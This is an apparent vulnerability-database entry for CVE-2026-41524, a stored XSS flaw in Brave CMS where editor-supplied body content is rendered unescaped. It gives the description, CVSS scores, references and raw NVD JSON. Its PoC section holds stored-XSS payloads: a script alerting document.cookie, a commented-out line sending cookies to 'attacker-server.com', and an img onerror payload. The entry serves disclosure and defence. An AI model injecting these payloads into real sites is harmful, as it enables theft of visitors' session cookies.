CVE-2026-41524

Description

Brave CMS is an open-source CMS. Prior to commit 6c56603, page and article body content entered through the CKEditor rich-text editor is stored verbatim in the database and subsequently rendered with Laravel Blade's unescaped output directive {!! !!}. Any JavaScript or HTML injected by an editor-role user is permanently stored and executed in every visitor's browser upon page load. This issue has been patched via commit 6c56603.

CVSS Details

CVSS Score

8.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Brave CMS (Commit 6c56603 之前的版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
PoC for CVE-2026-41524 - Stored XSS in Brave CMS
Description: Inject this payload into the CKEditor Body field when creating or editing a page.
-->

<script>
  // Demonstrate XSS execution by alerting the document cookie
  alert('XSS Vulnerability Confirmed: ' + document.cookie);
  
  // Example: Exfiltrate data to an external server controlled by the attacker
  // var img = new Image();
  // img.src = "http://attacker-server.com/steal?c=" + encodeURIComponent(document.cookie);
  // document.body.appendChild(img);
</script>

<!-- Alternatively, use an image tag to execute JS without script blocks (often bypasses simple filters) -->
<img src=x onerror="alert('XSS via Image Tag')">

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41524
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41524
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41524/
[4] VulDB https://vuldb.com/cve/CVE-2026-41524
[5] https://github.com/Ajax30/BraveCMS-2.0/commit/6c5660373cf5f0ca9181603280427aca46ef11ea
[6] https://github.com/Ajax30/BraveCMS-2.0/security/advisories/GHSA-xj46-722x-6433
[7] https://github.com/Ajax30/BraveCMS-2.0/security/advisories/GHSA-xj46-722x-6433

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41524", "sourceIdentifier": "[email protected]", "published": "2026-05-08T15:16:40.253", "lastModified": "2026-05-08T22:16:30.473", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Brave CMS is an open-source CMS. Prior to commit 6c56603, page and article body content entered through the CKEditor rich-text editor is stored verbatim in the database and subsequently rendered with Laravel Blade's unescaped output directive {!! !!}. Any JavaScript or HTML injected by an editor-role user is permanently stored and executed in every visitor's browser upon page load. This issue has been patched via commit 6c56603."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/Ajax30/BraveCMS-2.0/commit/6c5660373cf5f0ca9181603280427aca46ef11ea", "source": "[email protected]"}, {"url": "https://github.com/Ajax30/BraveCMS-2.0/security/advisories/GHSA-xj46-722x-6433", "source": "[email protected]"}, {"url": "https://github.com/Ajax30/BraveCMS-2.0/security/advisories/GHSA-xj46-722x-6433", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}